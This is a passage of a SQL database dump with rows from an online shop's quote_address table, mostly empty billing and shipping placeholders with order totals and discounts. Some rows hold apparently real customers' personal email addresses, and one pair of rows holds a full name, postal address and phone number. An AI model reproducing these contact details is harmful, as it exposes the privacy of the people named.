(567, 465, '2025-03-30 07:54:45', '2025-03-30 07:54:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(568, 465, '2025-03-30 07:54:45', '2025-03-30 07:54:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(569, 466, '2025-03-30 07:58:51', '2025-03-30 07:58:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(570, 466, '2025-03-30 07:58:51', '2025-03-30 07:58:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(571, 467, '2025-04-07 08:54:24', '2025-04-07 08:54:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(572, 467, '2025-04-07 08:54:24', '2025-04-07 08:54:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(573, 468, '2025-04-07 09:34:28', '2025-04-07 09:34:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, 'flatrate_flatrate', NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(574, 468, '2025-04-07 09:34:28', '2025-04-07 09:34:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(575, 469, '2025-04-07 11:13:46', '2025-04-07 11:13:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(576, 469, '2025-04-07 11:13:46', '2025-04-07 11:13:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(577, 470, '2025-05-04 17:34:33', '2025-05-04 17:34:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(578, 470, '2025-05-04 17:34:33', '2025-05-04 17:34:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(579, 471, '2025-05-05 19:58:35', '2025-05-05 19:58:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(580, 471, '2025-05-05 19:58:35', '2025-05-05 19:58:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(581, 472, '2025-05-23 12:20:11', '2025-05-23 12:20:11', 112, 0, NULL, 'billing', 'bjzqwamq@formtest.guru', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(582, 472, '2025-05-23 12:20:11', '2025-05-23 12:20:11', 112, 0, NULL, 'shipping', 'bjzqwamq@formtest.guru', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(583, 473, '2025-07-02 22:24:29', '2025-07-02 22:24:29', 113, 0, NULL, 'billing', 'mikesdrums@aol.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(584, 473, '2025-07-02 22:24:29', '2025-07-02 22:24:29', 113, 0, NULL, 'shipping', 'mikesdrums@aol.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(585, 474, '2025-07-04 22:01:03', '2025-07-04 22:01:03', 114, 0, NULL, 'billing', 'arleendoug12@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(586, 474, '2025-07-04 22:01:03', '2025-07-04 22:01:03', 114, 0, NULL, 'shipping', 'arleendoug12@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(587, 475, '2025-08-19 11:44:46', '2025-08-19 11:44:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(588, 475, '2025-08-19 11:44:46', '2025-08-19 11:44:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(589, 476, '2025-09-11 09:53:02', '2025-09-11 09:53:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(590, 476, '2025-09-11 09:53:02', '2025-09-11 09:53:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(591, 477, '2025-09-28 13:47:42', '2025-09-28 13:47:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(592, 477, '2025-09-28 13:47:42', '2025-09-28 13:47:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(593, 478, '2025-09-28 15:40:49', '2025-09-28 15:40:49', NULL, 0, NULL, 'billing', NULL, NULL, 'Dexter', NULL, 'Borer', NULL, 'Lauren Company', 'Po Box 486', 'Pierre', 'South Dakota', 55, '57501', 'US', '+19289914540', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(594, 478, '2025-09-28 15:40:49', '2025-09-28 15:40:53', NULL, 0, NULL, 'shipping', NULL, NULL, 'Dexter', NULL, 'Borer', NULL, 'Dexter Company', 'Po Box 486', 'Pierre', 'South Dakota', 55, '57501', 'US', '+19289914540', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(595, 479, '2025-10-01 21:55:53', '2025-10-01 21:55:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(596, 479, '2025-10-01 21:55:53', '2025-10-01 21:55:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(597, 480, '2025-10-28 15:30:24', '2025-10-28 15:30:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(598, 480, '2025-10-28 15:30:24', '2025-10-28 15:30:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(599, 481, '2025-10-28 15:30:38', '2025-10-28 15:30:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(600, 481, '2025-10-28 15:30:38', '2025-10-28 15:30:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(601, 482, '2025-11-10 21:17:16', '2025-11-10 21:17:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(602, 482, '2025-11-10 21:17:16', '2025-11-10 21:17:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(603, 483, '2025-11-10 21:17:24', '2025-11-10 21:17:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(604, 483, '2025-11-10 21:17:24', '2025-11-10 21:17:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(605, 484, '2025-11-12 12:51:09', '2025-11-12 12:51:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(606, 484, '2025-11-12 12:51:09', '2025-11-12 12:51:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(607, 485, '2025-11-12 12:51:19', '2025-11-12 12:51:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(608, 485, '2025-11-12 12:51:19', '2025-11-12 12:51:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(609, 486, '2025-11-13 16:14:31', '2025-11-13 16:14:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(610, 486, '2025-11-13 16:14:31', '2025-11-13 16:14:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
